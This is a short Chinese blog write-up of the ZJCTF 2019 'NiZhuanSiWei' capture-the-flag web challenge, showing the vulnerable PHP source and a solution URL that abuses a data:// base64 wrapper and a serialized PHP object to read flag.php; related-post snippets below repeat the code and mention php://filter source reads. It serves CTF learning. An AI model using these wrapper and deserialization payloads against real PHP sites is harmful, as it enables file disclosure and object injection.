file_get_contonts[ZJCTF 2019]NiZhuanSiWei

最新推荐文章于 2022-11-17 19:51:11 发布
最新推荐文章于 2022-11-17 19:51:11 发布
阅读量121 收藏
点赞数
分类专栏: 刷题 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61142406/article/details/124991740
版权 
 <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";//需要text是文件但是又要是字符串用php://input和data:text/plain;base64,绕过
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:“Flag”:1:{s:4:“file”;s:8:“flag.php”;}
data绕过file_get_contents,也可以使用put

I·CE
关注
专栏目录
windows nginx使用file_get_contents、fopen、curl访问php文件造成阻塞的解决办法
贝伦酱
04-04 2952
windows nginx造成的file_get_contents、fopen、curl在访问本地php文件造成阻塞的问题相信很多人都遇到过,关于这个问题涉及到了php的运行等问题,有兴趣的可以先去看我上一篇博客对php运行的讲解php的运行原理、cgi对比fastcgi以及php-cgi和php-fpm之间的联系区别。这个问题有许多博客都讲解过,不过在我解决问题的过程中我发现许多博客写的要么不够
php file_get_contents向网页提交Cookie并获取源码
LisenH的博客
10-26 5741
本地代码: $cookie = 'Name=Content;SRCHD=AF=NOFORM;PPLState=1'; $opts = array('http' => array('header'=> 'Cookie:'.@$cookie.'')); $context = stream_context_create($opts); $contents = file_get_contents('ht
CTF web小总结
A_dmin的博客
07-15 3765
PHP绕过技巧、SQL技巧、命令执行绕过小技巧、反序列化、文件上传绕过
nssctf刷题
weixin_63231007的博客
04-30 1163
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'
ctf题php反序列化,从一道CTF题中学习php反序列化与伪协议
weixin_39927214的博客
04-01 1854
之前一直有想写关于反序列化的东西,可是一直拖拖拖,拖到了现在。本文尝试从ZJCTF2019中的例题来了解何为php反序列,以及php伪协议。原题:逆转思维1234567891011121314151617181920$text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&am...
每天一道ctf
whisper921的博客
11-13 918
构造:data://text/plain,welcome to the zjctf,为了绕过某些过滤,这里用到base64编码。然后有一个可控参数file,构造file=useless.php,但是针对php文件我们需要进行base64编码,否则读取不到其内容,所以构造payload:file=php://filter/read=convert.base64-encode/resource=useless.php。结果为:O:4:"Flag":1:{s:4:"file";
ctf php正则截断,记[BJDCTF2020]ZJCTF,不过如此 关于php的正则匹配问题
weixin_42099942的博客
03-17 561
题目一上来就直接放出一段代码,那么话不多说,直接进行代码设计。error_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){echo "".file_get_contents($tex...
6.level6-[本地复现]-[file_get_conents]-[php://input伪协议]
qwsn
12-29 2832
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录PHP反序列化漏洞level6-[本地复现]-[file_get_conents]-[php://input伪协议]1.题目描述2.代码审计3.解题过程4.总结 PHP反序列化漏洞 level6-[本地复现]-[file_get_conents]-[php://input伪协议] 1.题目描述 <?php error_reporting(0); include("flag.php"); class Flag{
[ZJCTF 2019] web题-NiZhuanSiWei
BROTHERYY的博客
07-08 423
复现环境:buuoj.cn 开题源码一份 分析源码 需要将内容"welcome to the zjctf"传入到$text,才能有下一步操作 payload:/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY= 然后是file参数,使用filter来读取useless.php,解码得源码 <?php class Flag{ //flag.php public $file; public functi
[ZJCTF 2019]NiZhuanSiWei
最新发布
09-16
[ZJCTF 2019]NiZhuanSiWei是一道题目,根据给出的代码,它的功能是通过传入的参数来判断是否满足条件,如果满足条件,则输出对应的内容。在给定的源码中,根据传入的text参数,如果其内容是"welcome to the zjctf",...
file_get_contents(php://input, r)实例介绍
12-18
解释不清,直接上例子index.html复制代码 代码如下:  <form action=”action.php” method=”post” >  <input type=”text” name=”userName”  id=”userName” /><br>  <input type=”text” name=”userPass”  id=”userPass” /><br>  <input type=”submit” value=”ok” /> </form>action.php复制代码 代码如下:<?php$raw_post_data = file_get_contents(‘php:
CTF-反序列化
qq_61774705的博客
08-15 4590
反序列化
Wmm的学习日记(文件包含漏洞.PHP伪协议)
swmmbswzy的博客
11-17 560
CTFweb方向PHP文件包含漏洞PHP伪协议解决方法
[ZJCTF 2019]NiZhuanSiWei
m0_62092622的博客
04-06 1038
打开题目 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1><
ctf (NiZhuanSiWei)
Glacier_Mount的博客
06-27 393
这是一道简单的web题涉及data://伪协议、php伪协议和反序列化的简单应用。
BUUCTF刷题记录(2)
bmth666的博客
05-07 1911
文章目录web[De1CTF 2019]SSRF Me[极客大挑战 2019]PHP web [De1CTF 2019]SSRF Me [极客大挑战 2019]PHP 由于有备份文件,尝试www.zip发现可以下载!!! 得到flag.php文件,但发现Syc{dog_dog_dog_dog}并不是。。。。然后查看class.php得到 <?php include 'flag.php';...
file_get_contents("php://input", "r")
彷徨的梦想
01-06 2060
解释不清,直接上例子 index.html [html] view plaincopy  form action="action.php" method="post" >    input type="text" name="userName"  id="userName" />br/>    input type="text" name="u
php 采集文件,php file_get_contents()读取采集远程文件内容_PHP教程
weixin_35562225的博客
03-10 871
我们来看php手册讲述关于file_get_contents() 函数把整个文件读入一个字符串中和 file() 一样,不同的是 file_get_contents() 把文件读入一个字符串。file_get_contents() 函数是用于将文件的内容读入到一个字符串中的首选方法上面是帮助手册的是一次性把内容全部读入内存了,后面的实例我们也会讲到_get_contents可以将远程文件读入为一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值